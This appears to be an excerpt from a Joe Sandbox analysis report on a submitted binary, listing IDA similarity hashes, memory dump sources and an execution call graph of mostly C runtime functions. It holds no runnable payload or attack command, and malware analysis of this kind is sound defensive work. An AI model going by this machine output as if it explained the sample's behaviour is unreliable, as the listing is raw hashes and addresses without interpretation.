                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bed000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 175685635328b0f0ae21bca88774b559a7cef355c45d188e64f727b612b97546
                                                                                • Instruction ID: bffaae3e97d726cf7fac53d4e29191c34a2393bf9e9299d7a86d1c0a30671ce5
                                                                                • Opcode Fuzzy Hash: 175685635328b0f0ae21bca88774b559a7cef355c45d188e64f727b612b97546
                                                                                • Instruction Fuzzy Hash: 492137B1504284DFDB00CF14D9C0B2ABFE5FBA8328F2486A9E9054B246C376DC46DBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300542576.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bfd000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bcda3e14ef30ac6aa99fd25b0858f5800c34cac94fe5ca0fefcf8902d1e063a
                                                                                • Instruction ID: ad00e1fdb10de56275bb14ea67fa5801d5c50a15501fabe475ba184756eea875
                                                                                • Opcode Fuzzy Hash: 5bcda3e14ef30ac6aa99fd25b0858f5800c34cac94fe5ca0fefcf8902d1e063a
                                                                                • Instruction Fuzzy Hash: F22107B1504248DFDB14DF24D4D0B2ABBA6FB84314F24C6A9EA494B246CB36D84BDB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300542576.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bfd000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3fec5ed544640d752678bbef4902572eb2d91c27fa7199acfb90bc264f28a080
                                                                                • Instruction ID: 13bbb50d5f874ff6d35f082d2963cf2fae7b5b85a4fbc563ee4b907463db2d4b
                                                                                • Opcode Fuzzy Hash: 3fec5ed544640d752678bbef4902572eb2d91c27fa7199acfb90bc264f28a080
                                                                                • Instruction Fuzzy Hash: D3210AB1504248DFDB01DF14D5C0B3ABBA6FB84314F24C6ADDA494B246C736D84ADBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300542576.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bfd000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2daa74758f3d826703cfbf1538733ed9bdecee6ae61a4e17c5085992ac88af82
                                                                                • Instruction ID: acf9553ed29859ee80e96f7d7b06241006e99d60970f7f47bb47e66bd4f33e3d
                                                                                • Opcode Fuzzy Hash: 2daa74758f3d826703cfbf1538733ed9bdecee6ae61a4e17c5085992ac88af82
                                                                                • Instruction Fuzzy Hash: 0921C6755093848FCB02CF20D5A0B15BFB2EB45314F28C5EAD8498B697C33AD80ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300511187.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bed000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction ID: 86a8701762badcc097174aa8df25d24a5467c1654323be9c3cd95e932397a03e
                                                                                • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction Fuzzy Hash: 3211D376504284DFDB01CF10D5C4B16BFB2FB94320F24C6A9D8080B756C33AE85ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300511187.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bed000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction ID: dd1c6da267358e34439cd1d65abf1dc297de72cb9cdf9a4d5470e9b4db72a02a
                                                                                • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction Fuzzy Hash: 9E11D376904280CFCB11CF10D9C4B16BFB1FB94324F24C6A9D8050B656C33AD85ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300542576.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bfd000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction ID: 6766b00c5565c21c08379b667851861c46eb30a9968c9f533c078670ec459020
                                                                                • Opcode Fuzzy Hash: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction Fuzzy Hash: 21119075904284DFDB11CF10D5C4B25FBB2FB84314F24C6AED9494B656C33AD84ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eb69fc6506cd37e5a37ecb1b95cea2ccb3ae632602636058bac76b84e2ec868
                                                                                • Instruction ID: 201afe3a3c5027b83b395c81c5b8b8c630a27709954a8048587db6e74d02d424
                                                                                • Opcode Fuzzy Hash: 7eb69fc6506cd37e5a37ecb1b95cea2ccb3ae632602636058bac76b84e2ec868
                                                                                • Instruction Fuzzy Hash: C912C5F1C91B468BDB90CF25E99818D3BA1B744328BD16A08D3631AAD4D7B419FECF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 481fa49de4779aa62bfc987c73a0dc3c54767d2ea0673cdf93e23572b3a8521a
                                                                                • Instruction ID: 2ccb5325c5818ec3aa0f4b49c0fe87b5521b252cdd61fae3f21651adb827c563
                                                                                • Opcode Fuzzy Hash: 481fa49de4779aa62bfc987c73a0dc3c54767d2ea0673cdf93e23572b3a8521a
                                                                                • Instruction Fuzzy Hash: 82A17E32E0061ACFCF05DFE5C8885DEB7B2FF85300B15856AE916BB261DB31A955DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 485cd75ec4c9ae36890f72d4a61ad8639ac64d3058d4388a8eadca8ebb2a5a15
                                                                                • Instruction ID: 88e2586f36b20027ef5798d205e7b5de40f86b2e6819631ace707c716163304f
                                                                                • Opcode Fuzzy Hash: 485cd75ec4c9ae36890f72d4a61ad8639ac64d3058d4388a8eadca8ebb2a5a15
                                                                                • Instruction Fuzzy Hash: FBC11BB1C917468BDB94CF25E99818D3BA1BB45328FD16A08D3622B6D0D7B418FECF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:11%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:12.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:79
                                                                                execution_graph 19405 41b274 19406 41b417 19405->19406 19408 41b29e 19405->19408 19407 416437 __dosmaperr 14 API calls 19406->19407 19424 41b402 19407->19424 19408->19406 19411 41b2e9 19408->19411 19409 4139d2 _ValidateLocalCookies 5 API calls 19410 41b434 19409->19410 19426 421db5 19411->19426 19415 41b31d 19416 41b436 19415->19416 19441 4215ef 19415->19441 19418 417ecf __wsopen_s 11 API calls 19416->19418 19420 41b442 19418->19420 19419 41b32f 19419->19416 19448 42161b 19419->19448 19422 41b341 19422->19416 19423 41b34a 19422->19423 19423->19424 19455 421e12 19423->19455 19424->19409 19427 421dc1 ___scrt_is_nonwritable_in_current_image 19426->19427 19428 41b309 19427->19428 19463 419123 EnterCriticalSection 19427->19463 19434 4215c3 19428->19434 19430 421dd2 19433 421de6 19430->19433 19464 421cd7 19430->19464 19482 421e09 19433->19482 19435 4215e4 19434->19435 19436 4215cf 19434->19436 19435->19415 19437 416437 __dosmaperr 14 API calls 19436->19437 19438 4215d4 19437->19438 19439 417ea2 __wsopen_s 25 API calls 19438->19439 19440 4215df 19439->19440 19440->19415 19442 421610 19441->19442 19443 4215fb 19441->19443 19442->19419 19444 416437 __dosmaperr 14 API calls 19443->19444 19445 421600 19444->19445 19446 417ea2 __wsopen_s 25 API calls 19445->19446 19447 42160b 19446->19447 19447->19419 19449 421627 19448->19449 19450 42163c 19448->19450 19451 416437 __dosmaperr 14 API calls 19449->19451 19450->19422 19452 42162c 19451->19452 19453 417ea2 __wsopen_s 25 API calls 19452->19453 19454 421637 19453->19454 19454->19422 19456 421e1e ___scrt_is_nonwritable_in_current_image 19455->19456 19646 419123 EnterCriticalSection 19456->19646 19458 421e29 19647 421647 19458->19647 19463->19430 19465 421d23 19464->19465 19466 419d1a __fread_nolock 15 API calls 19465->19466 19479 421d2a 19465->19479 19477 421d42 19466->19477 19467 421d9a 19468 421d97 19467->19468 19547 421b7c 19467->19547 19471 419831 _free 14 API calls 19468->19471 19470 421d91 19485 4219a1 19470->19485 19474 421da5 19471->19474 19472 421d49 19476 419831 _free 14 API calls 19472->19476 19475 4139d2 _ValidateLocalCookies 5 API calls 19474->19475 19478 421db3 19475->19478 19476->19479 19477->19472 19480 421d6f 19477->19480 19478->19433 19479->19467 19479->19470 19481 419831 _free 14 API calls 19480->19481 19481->19479 19645 41916b LeaveCriticalSection 19482->19645 19484 421e10 19484->19428 19486 4219b0 19485->19486 19487 42161b 25 API calls 19486->19487 19488 4219c6 19487->19488 19489 4215c3 25 API calls 19488->19489 19545 421b4b 19488->19545 19492 4219d8 19489->19492 19490 417ecf __wsopen_s 11 API calls 19493 421b7b 19490->19493 19491 419831 _free 14 API calls 19494 421a28 19491->19494 19492->19491 19497 421b52 19492->19497 19492->19545 19495 42161b 25 API calls 19493->19495 19501 419d1a __fread_nolock 15 API calls 19494->19501 19496 421ba1 19495->19496 19498 421ccc 19496->19498 19499 4215c3 25 API calls 19496->19499 19497->19468 19500 417ecf __wsopen_s 11 API calls 19498->19500 19502 421bb3 19499->19502 19507 421cd6 19500->19507 19503 421a40 19501->19503 19502->19498 19505 4215ef 25 API calls 19502->19505 19504 419831 _free 14 API calls 19503->19504 19511 421a4c 19504->19511 19506 421bc5 19505->19506 19506->19498 19508 421bce 19506->19508 19509 421d2a 19507->19509 19512 419d1a __fread_nolock 15 API calls 19507->19512 19510 419831 _free 14 API calls 19508->19510 19514 421d9a 19509->19514 19519 421d91 19509->19519 19513 421bd9 GetTimeZoneInformation 19510->19513 19511->19497 19515 418f7c ___std_exception_copy 25 API calls 19511->19515 19518 421d42 19512->19518 19522 421c90 19513->19522 19526 421bf5 19513->19526 19516 421d97 19514->19516 19517 421b7c 42 API calls 19514->19517 19520 421a76 19515->19520 19521 419831 _free 14 API calls 19516->19521 19517->19516 19532 421d6f 19518->19532 19533 421d49 19518->19533 19523 4219a1 42 API calls 19519->19523 19520->19545 19584 424157 19520->19584 19525 421da5 19521->19525 19522->19468 19523->19516 19527 4139d2 _ValidateLocalCookies 5 API calls 19525->19527 19596 41f913 19526->19596 19531 421db3 19527->19531 19528 419831 _free 14 API calls 19528->19509 19531->19468 19534 419831 _free 14 API calls 19532->19534 19533->19528 19534->19509 19536 41f00b __cftof WideCharToMultiByte 19537 421c61 19536->19537 19539 41f00b __cftof WideCharToMultiByte 19537->19539 19539->19522 19541 421b0a 19541->19497 19544 424157 25 API calls 19541->19544 19542 4179b2 40 API calls 19543 421adb 19542->19543 19543->19541 19546 4179b2 40 API calls 19543->19546 19544->19545 19545->19490 19545->19497 19546->19541 19548 421b8b 19547->19548 19549 42161b 25 API calls 19548->19549 19550 421ba1 19549->19550 19551 421ccc 19550->19551 19552 4215c3 25 API calls 19550->19552 19553 417ecf __wsopen_s 11 API calls 19551->19553 19554 421bb3 19552->19554 19557 421cd6 19553->19557 19554->19551 19555 4215ef 25 API calls 19554->19555 19556 421bc5 19555->19556 19556->19551 19558 421bce 19556->19558 19560 419d1a __fread_nolock 15 API calls 19557->19560 19576 421d2a 19557->19576 19559 419831 _free 14 API calls 19558->19559 19561 421bd9 GetTimeZoneInformation 19559->19561 19573 421d42 19560->19573 19570 421bf5 19561->19570 19581 421c90 19561->19581 19562 421d9a 19563 421d97 19562->19563 19564 421b7c 42 API calls 19562->19564 19566 419831 _free 14 API calls 19563->19566 19564->19563 19565 421d91 19568 4219a1 42 API calls 19565->19568 19569 421da5 19566->19569 19567 421d49 19572 419831 _free 14 API calls 19567->19572 19568->19563 19571 4139d2 _ValidateLocalCookies 5 API calls 19569->19571 19574 41f913 37 API calls 19570->19574 19575 421db3 19571->19575 19572->19576 19573->19567 19577 421d6f 19573->19577 19579 421c48 19574->19579 19575->19468 19576->19562 19576->19565 19578 419831 _free 14 API calls 19577->19578 19578->19576 19580 41f00b __cftof WideCharToMultiByte 19579->19580 19582 421c61 19580->19582 19581->19468 19583 41f00b __cftof WideCharToMultiByte 19582->19583 19583->19581 19588 4240a4 19584->19588 19585 4240bc 19586 421a8f 19585->19586 19587 416437 __dosmaperr 14 API calls 19585->19587 19586->19545 19593 4179b2 19586->19593 19589 4240c6 19587->19589 19588->19585 19588->19586 19591 4240f4 19588->19591 19590 417ea2 __wsopen_s 25 API calls 19589->19590 19590->19586 19591->19586 19592 416437 __dosmaperr 14 API calls 19591->19592 19592->19589 19601 4176cb 19593->19601 19597 41a122 __fassign 37 API calls 19596->19597 19598 41f91e 19597->19598 19599 41a81b __fassign 37 API calls 19598->19599 19600 41f92e 19599->19600 19600->19536 19619 4174ce 19601->19619 19603 417716 19604 4157f5 __fassign 37 API calls 19603->19604 19611 417722 19604->19611 19605 4176f2 19607 416437 __dosmaperr 14 API calls 19605->19607 19606 4176dd 19606->19603 19606->19605 19618 417702 19606->19618 19608 4176f7 19607->19608 19609 417ea2 __wsopen_s 25 API calls 19608->19609 19609->19618 19612 417751 19611->19612 19626 417919 19611->19626 19613 4177bb 19612->19613 19632 4178f0 19612->19632 19614 4178f0 25 API calls 19613->19614 19616 417883 19614->19616 19617 416437 __dosmaperr 14 API calls 19616->19617 19616->19618 19617->19618 19618->19541 19618->19542 19620 4174d3 19619->19620 19621 4174e6 19619->19621 19622 416437 __dosmaperr 14 API calls 19620->19622 19621->19606 19623 4174d8 19622->19623 19624 417ea2 __wsopen_s 25 API calls 19623->19624 19625 4174e3 19624->19625 19625->19606 19627 417956 19626->19627 19629 417926 19626->19629 19628 41d373 __wsopen_s 37 API calls 19627->19628 19631 417935 __fassign 19628->19631 19629->19631 19638 41d397 19629->19638 19631->19611 19633 417901 19632->19633 19634 417915 19632->19634 19633->19634 19635 416437 __dosmaperr 14 API calls 19633->19635 19634->19613 19636 41790a 19635->19636 19637 417ea2 __wsopen_s 25 API calls 19636->19637 19637->19634 19639 4157f5 __fassign 37 API calls 19638->19639 19640 41d3b4 19639->19640 19641 41fbbb 40 API calls 19640->19641 19642 41d3c4 19640->19642 19641->19642 19643 4139d2 _ValidateLocalCookies 5 API calls 19642->19643 19644 41d460 19643->19644 19644->19631 19645->19484 19646->19458 19648 4215c3 25 API calls 19647->19648 19649 42165f 19648->19649 19650 421856 19649->19650 19651 421668 19649->19651 19652 417ecf __wsopen_s 11 API calls 19650->19652 19654 421792 19651->19654 19655 421698 19651->19655 19661 42178d 19651->19661 19653 421860 19652->19653 19656 421861 25 API calls 19654->19656 19666 421861 19655->19666 19657 4217b8 19656->19657 19659 421861 25 API calls 19657->19659 19659->19661 19663 421e5d 19661->19663 19662 421861 25 API calls 19662->19661 19673 41916b LeaveCriticalSection 19663->19673 19665 421e48 19665->19424 19668 421878 19666->19668 19667 4215ef 25 API calls 19669 42194e 19667->19669 19668->19667 19670 421714 19668->19670 19669->19670 19671 417ecf __wsopen_s 11 API calls 19669->19671 19670->19662 19672 4219a0 19671->19672 19673->19665 17543 40680b GetFileAttributesA 17545 406817 17543->17545 17544 40702a 17547 417eb2 25 API calls 17544->17547 17545->17544 17546 4068d7 17545->17546 17549 412440 27 API calls 17546->17549 17548 40704d 17547->17548 17550 407008 17549->17550 21024 418e1c 21027 418da3 21024->21027 21028 418daf ___scrt_is_nonwritable_in_current_image 21027->21028 21035 419123 EnterCriticalSection 21028->21035 21030 418de7 21036 418e05 21030->21036 21031 418db9 21031->21030 21033 420028 __fassign 14 API calls 21031->21033 21033->21031 21035->21031 21039 41916b LeaveCriticalSection 21036->21039 21038 418df3 21039->21038 21293 41928b 21303 419d11 21293->21303 21297 419298 21298 419a47 14 API calls 21297->21298 21299 4192a7 DeleteCriticalSection 21298->21299 21299->21297 21300 4192c2 21299->21300 21301 419831 _free 14 API calls 21300->21301 21302 4192cd 21301->21302 21316 419bbf 21303->21316 21306 42059c 21307 4205a8 ___scrt_is_nonwritable_in_current_image 21306->21307 21385 419123 EnterCriticalSection 21307->21385 21309 42061f 21386 42063e 21309->21386 21310 4205b3 21310->21309 21313 4205f3 DeleteCriticalSection 21310->21313 21314 4156a2 67 API calls 21310->21314 21315 419831 _free 14 API calls 21313->21315 21314->21310 21315->21310 21319 419b13 21316->21319 21320 419b1f ___scrt_is_nonwritable_in_current_image 21319->21320 21327 419123 EnterCriticalSection 21320->21327 21322 419b29 ___scrt_uninitialize_crt 21323 419b95 21322->21323 21328 419a87 21322->21328 21336 419bb3 21323->21336 21327->21322 21329 419a93 ___scrt_is_nonwritable_in_current_image 21328->21329 21339 4192d7 EnterCriticalSection 21329->21339 21331 419a9d ___scrt_uninitialize_crt 21335 419ad6 21331->21335 21340 419cc9 21331->21340 21350 419b07 21335->21350 21384 41916b LeaveCriticalSection 21336->21384 21338 419293 21338->21306 21339->21331 21341 419cd6 21340->21341 21342 419cdf 21340->21342 21343 419bbf ___scrt_uninitialize_crt 66 API calls 21341->21343 21344 419c64 ___scrt_uninitialize_crt 62 API calls 21342->21344 21345 419cdc 21343->21345 21346 419ce5 21344->21346 21345->21335 21346->21345 21347 419a20 __fread_nolock 25 API calls 21346->21347 21348 419cfb 21347->21348 21353 4211f3 21348->21353 21383 4192eb LeaveCriticalSection 21350->21383 21352 419af5 21352->21322 21354 421211 21353->21354 21355 421204 21353->21355 21357 42125a 21354->21357 21359 421238 21354->21359 21356 416437 __dosmaperr 14 API calls 21355->21356 21363 421209 21356->21363 21358 416437 __dosmaperr 14 API calls 21357->21358 21360 42125f 21358->21360 21364 421151 21359->21364 21362 417ea2 __wsopen_s 25 API calls 21360->21362 21362->21363 21363->21345 21365 42115d ___scrt_is_nonwritable_in_current_image 21364->21365 21378 41af12 EnterCriticalSection 21365->21378 21367 42116c 21368 4211b3 21367->21368 21369 41b18e __wsopen_s 25 API calls 21367->21369 21370 416437 __dosmaperr 14 API calls 21368->21370 21371 421198 FlushFileBuffers 21369->21371 21372 4211b8 21370->21372 21371->21372 21373 4211a4 21371->21373 21379 4211e7 21372->21379 21374 416424 __dosmaperr 14 API calls 21373->21374 21377 4211a9 GetLastError 21374->21377 21377->21368 21378->21367 21382 41afc7 LeaveCriticalSection 21379->21382 21381 4211d0 21381->21363 21382->21381 21383->21352 21384->21338 21385->21310 21389 41916b LeaveCriticalSection 21386->21389 21388 42062b 21388->21297 21389->21388 17551 406c8b GetFileAttributesA 17553 406c97 17551->17553 17552 40703e 17555 417eb2 25 API calls 17552->17555 17553->17552 17554 406d57 17553->17554 17558 412440 27 API calls 17554->17558 17556 407043 17555->17556 17557 417eb2 25 API calls 17556->17557 17559 407048 17557->17559 17560 407008 17558->17560 17561 40704d 17559->17561 17562 417eb2 25 API calls 17559->17562 17562->17561 17624 41968f 17629 419465 17624->17629 17627 4196ce 17630 419484 17629->17630 17631 419497 17630->17631 17639 4194ac 17630->17639 17632 416437 __dosmaperr 14 API calls 17631->17632 17633 41949c 17632->17633 17634 417ea2 __wsopen_s 25 API calls 17633->17634 17635 4194a7 17634->17635 17635->17627 17646 420e07 17635->17646 17636 416437 __dosmaperr 14 API calls 17637 41967d 17636->17637 17638 417ea2 __wsopen_s 25 API calls 17637->17638 17638->17635 17644 4195cc 17639->17644 17649 420696 17639->17649 17641 41961c 17642 420696 37 API calls 17641->17642 17641->17644 17643 41963a 17642->17643 17643->17644 17645 420696 37 API calls 17643->17645 17644->17635 17644->17636 17645->17644 17880 4207cc 17646->17880 17650 4206a5 17649->17650 17651 4206ed 17649->17651 17653 4206ab 17650->17653 17656 4206c8 17650->17656 17663 420703 17651->17663 17654 416437 __dosmaperr 14 API calls 17653->17654 17655 4206b0 17654->17655 17658 417ea2 __wsopen_s 25 API calls 17655->17658 17657 416437 __dosmaperr 14 API calls 17656->17657 17662 4206e6 17656->17662 17659 4206d7 17657->17659 17660 4206bb 17658->17660 17661 417ea2 __wsopen_s 25 API calls 17659->17661 17660->17641 17661->17660 17662->17641 17664 420713 17663->17664 17665 42072d 17663->17665 17666 416437 __dosmaperr 14 API calls 17664->17666 17667 420735 17665->17667 17668 42074c 17665->17668 17669 420718 17666->17669 17670 416437 __dosmaperr 14 API calls 17667->17670 17671 420758 17668->17671 17672 42076f 17668->17672 17673 417ea2 __wsopen_s 25 API calls 17669->17673 17674 42073a 17670->17674 17675 416437 __dosmaperr 14 API calls 17671->17675 17680 420723 17672->17680 17681 4157f5 17672->17681 17673->17680 17677 417ea2 __wsopen_s 25 API calls 17674->17677 17678 42075d 17675->17678 17677->17680 17679 417ea2 __wsopen_s 25 API calls 17678->17679 17679->17680 17680->17660 17682 415815 17681->17682 17688 41580c 17681->17688 17682->17688 17689 41a122 GetLastError 17682->17689 17688->17680 17690 41a13f 17689->17690 17691 41a139 17689->17691 17692 41a69f __dosmaperr 6 API calls 17690->17692 17713 41a145 SetLastError 17690->17713 17693 41a660 __dosmaperr 6 API calls 17691->17693 17694 41a15d 17692->17694 17693->17690 17695 41dfbf __dosmaperr 14 API calls 17694->17695 17694->17713 17697 41a16d 17695->17697 17698 41a175 17697->17698 17699 41a18c 17697->17699 17704 41a69f __dosmaperr 6 API calls 17698->17704 17703 41a69f __dosmaperr 6 API calls 17699->17703 17700 415835 17716 41a81b 17700->17716 17701 41a1d9 17724 418fd6 17701->17724 17706 41a198 17703->17706 17707 41a183 17704->17707 17708 41a1ad 17706->17708 17709 41a19c 17706->17709 17712 419831 _free 14 API calls 17707->17712 17711 419f50 __dosmaperr 14 API calls 17708->17711 17710 41a69f __dosmaperr 6 API calls 17709->17710 17710->17707 17714 41a1b8 17711->17714 17712->17713 17713->17700 17713->17701 17715 419831 _free 14 API calls 17714->17715 17715->17713 17717 41584b 17716->17717 17718 41a82e 17716->17718 17720 41a848 17717->17720 17718->17717 17837 41ffa7 17718->17837 17721 41a870 17720->17721 17722 41a85b 17720->17722 17721->17688 17722->17721 17859 41ed96 17722->17859 17735 41f6ca 17724->17735 17727 418fe6 17729 418ff0 IsProcessorFeaturePresent 17727->17729 17730 41900f 17727->17730 17731 418ffc 17729->17731 17765 4154b3 17730->17765 17733 417cf6 __wsopen_s 8 API calls 17731->17733 17733->17730 17768 41f5fc 17735->17768 17738 41f718 17739 41f724 ___scrt_is_nonwritable_in_current_image 17738->17739 17740 41a279 __dosmaperr 14 API calls 17739->17740 17744 41f751 __fassign 17739->17744 17745 41f74b __fassign 17739->17745 17740->17745 17741 41f796 17742 416437 __dosmaperr 14 API calls 17741->17742 17743 41f79b 17742->17743 17746 417ea2 __wsopen_s 25 API calls 17743->17746 17749 41f7c2 17744->17749 17779 419123 EnterCriticalSection 17744->17779 17745->17741 17745->17744 17747 41f780 17745->17747 17746->17747 17747->17727 17751 41f80a 17749->17751 17752 41f8ff 17749->17752 17762 41f835 17749->17762 17751->17762 17780 41f70f 17751->17780 17754 41f90a 17752->17754 17787 41916b LeaveCriticalSection 17752->17787 17755 4154b3 __fassign 23 API calls 17754->17755 17757 41f912 17755->17757 17759 41a122 __fassign 37 API calls 17763 41f889 17759->17763 17761 41f70f __fassign 37 API calls 17761->17762 17783 41f8ab 17762->17783 17763->17747 17764 41a122 __fassign 37 API calls 17763->17764 17764->17747 17789 41538d 17765->17789 17769 41f608 ___scrt_is_nonwritable_in_current_image 17768->17769 17774 419123 EnterCriticalSection 17769->17774 17771 41f616 17775 41f654 17771->17775 17774->17771 17778 41916b LeaveCriticalSection 17775->17778 17777 418fdb 17777->17727 17777->17738 17778->17777 17779->17749 17781 41a122 __fassign 37 API calls 17780->17781 17782 41f714 17781->17782 17782->17761 17784 41f8b1 17783->17784 17785 41f87a 17783->17785 17788 41916b LeaveCriticalSection 17784->17788 17785->17747 17785->17759 17785->17763 17787->17754 17788->17785 17790 41539b 17789->17790 17791 4153ad 17789->17791 17810 413755 GetModuleHandleW 17790->17810 17802 415234 17791->17802 17796 4153e6 17797 4153e8 17817 4153f1 17797->17817 17803 415240 ___scrt_is_nonwritable_in_current_image 17802->17803 17825 419123 EnterCriticalSection 17803->17825 17805 41524a 17826 4152a0 17805->17826 17807 415257 17830 415275 17807->17830 17811 413761 17810->17811 17811->17791 17812 415433 GetModuleHandleExW 17811->17812 17813 415452 GetProcAddress 17812->17813 17814 415467 17812->17814 17813->17814 17815 4153ac 17814->17815 17816 41547b FreeLibrary 17814->17816 17815->17791 17816->17815 17833 419182 GetPEB 17817->17833 17820 415420 17825->17805 17828 4152ac ___scrt_is_nonwritable_in_current_image 17826->17828 17827 41530d __fassign 17827->17807 17828->17827 17829 418989 __fassign 14 API calls 17828->17829 17829->17827 17831 41916b __wsopen_s LeaveCriticalSection 17830->17831 17832 415263 17831->17832 17832->17796 17832->17797 17834 41919c 17833->17834 17836 4153fb 17833->17836 17835 41a526 __fassign 5 API calls 17834->17835 17835->17836 17836->17820 17838 41ffb3 ___scrt_is_nonwritable_in_current_image 17837->17838 17839 41a122 __fassign 37 API calls 17838->17839 17840 41ffbc 17839->17840 17841 420002 17840->17841 17850 419123 EnterCriticalSection 17840->17850 17841->17717 17843 41ffda 17851 420028 17843->17851 17848 418fd6 __fassign 37 API calls 17849 420027 17848->17849 17850->17843 17852 41ffeb 17851->17852 17853 420036 __fassign 17851->17853 17855 420007 17852->17855 17853->17852 17854 41fd5b __fassign 14 API calls 17853->17854 17854->17852 17858 41916b LeaveCriticalSection 17855->17858 17857 41fffe 17857->17841 17857->17848 17858->17857 17860 41a122 __fassign 37 API calls 17859->17860 17861 41eda0 17860->17861 17864 41ecae 17861->17864 17865 41ecba ___scrt_is_nonwritable_in_current_image 17864->17865 17866 41ecd4 17865->17866 17875 419123 EnterCriticalSection 17865->17875 17868 41ecdb 17866->17868 17871 418fd6 __fassign 37 API calls 17866->17871 17868->17721 17869 41ed10 17876 41ed2d 17869->17876 17872 41ed4d 17871->17872 17873 41ece4 17873->17869 17874 419831 _free 14 API calls 17873->17874 17874->17869 17875->17873 17879 41916b LeaveCriticalSection 17876->17879 17878 41ed34 17878->17866 17879->17878 17881 4207d8 ___scrt_is_nonwritable_in_current_image 17880->17881 17882 4207df 17881->17882 17885 42080a 17881->17885 17883 416437 __dosmaperr 14 API calls 17882->17883 17884 4207e4 17883->17884 17886 417ea2 __wsopen_s 25 API calls 17884->17886 17891 420d99 17885->17891 17890 4207ee 17886->17890 17890->17627 17904 415878 17891->17904 17896 420dcf 17898 42082e 17896->17898 17899 419831 _free 14 API calls 17896->17899 17900 420861 17898->17900 17899->17898 17901 420867 17900->17901 17902 42088b 17900->17902 18448 41afc7 LeaveCriticalSection 17901->18448 17902->17890 17905 4157f5 __fassign 37 API calls 